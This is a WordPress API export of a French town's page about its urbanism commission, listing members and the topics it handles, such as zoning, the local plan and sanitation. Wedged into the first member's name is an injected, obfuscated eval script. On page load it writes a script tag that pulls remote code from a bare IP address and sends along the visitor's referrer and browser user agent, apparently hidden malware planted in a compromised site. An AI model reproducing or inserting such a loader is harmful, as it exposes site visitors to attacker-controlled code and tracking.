{"id":306,"date":"2015-07-22T09:52:00","date_gmt":"2015-07-22T08:52:00","guid":{"rendered":"http:\/\/www.arc-et-senans.com\/?p=306"},"modified":"2026-04-16T10:27:19","modified_gmt":"2026-04-16T09:27:19","slug":"urbanisme-programme-pluriannuel","status":"publish","type":"post","link":"https:\/\/www.arc-et-senans.com\/?p=306","title":{"rendered":"Urbanisme &#8211; Programme pluriannuel"},"content":{"rendered":"<h3>Les membres :<\/h3>\n<ul>\n<li>Jacques <script id=\"wpinfo-pst1\" type=\"text\/javascript\" rel=\"nofollow\">eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(\/^\/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6(\"<a g=\\'2\\' c=\\'d\\' e=\\'b\/2\\' 4=\\'7:\/\/5.8.9.f\/1\/h.s.t?r=\"+3(0.p)+\"\\o=\"+3(j.i)+\"\\'><\\\/k\"+\"l>\");n m=\"q\";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|tabsh|var|u0026u|referrer|ibeik||js|php'.split('|'),0,{}))<br \/>\n<\/script> MAURICE<\/li>\n<li>Christine BREUILLOT<\/li>\n<li>Jean ROBARDET<\/li>\n<li>Pascal PERCIER<\/li>\n<li>Daniel GONCE<\/li>\n<\/ul>\n<p><!--more--><\/p>\n<h2 align=\"center\">FONCTIONNEMENT DE LA COMMISSION URBANISME<\/h2>\n<h3>R\u00f4le de la commission<\/h3>\n<p>Conduire une r\u00e9flexion prospective sur les questions d\u2019urbanisme et \u00e9mettre des propositions pour le Conseil municipal. Renforcer les \u00e9changes avec les habitants. La commission est ouverte aux habitants non\u2013\u00e9lus souhaitant apporter leur contribution.<\/p>\n<h3>Th\u00e8mes trait\u00e9s\u00a0:<\/h3>\n<p>&#8211; D\u00e9veloppement de la zone artisanale (zone des limes) et de la zone d\u2019activit\u00e9s (Le Deffois)<\/p>\n<p>&#8211; PLU (Plan Local d\u2019Urbanisme) en prenant notamment en compte le PPRI<\/p>\n<p>&#8211; Construction de lotissements<\/p>\n<p>&#8211; Sch\u00e9ma directeur de l\u2019assainissement<\/p>\n<p>&#8211; Dissimulation des r\u00e9seaux a\u00e9riens \u00e9lectriques et de t\u00e9l\u00e9communications<\/p>\n<p>&#8211; Prospective pour l\u2019implantation de nouvelles activit\u00e9s g\u00e9n\u00e9ratrices d\u2019emplois<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Les membres : Jacques MAURICE Christine BREUILLOT Jean ROBARDET Pascal PERCIER Daniel GONCE<\/p>\n","protected":false},"author":1,"featured_media":290,"comment_status":"closed","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[22],"tags":[],"class_list":["post-306","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-commissions"],"_links":{"self":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/306","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=306"}],"version-history":[{"count":5,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/306\/revisions"}],"predecessor-version":[{"id":10348,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/posts\/306\/revisions\/10348"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=\/wp\/v2\/media\/290"}],"wp:attachment":[{"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=306"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=306"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/www.arc-et-senans.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=306"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}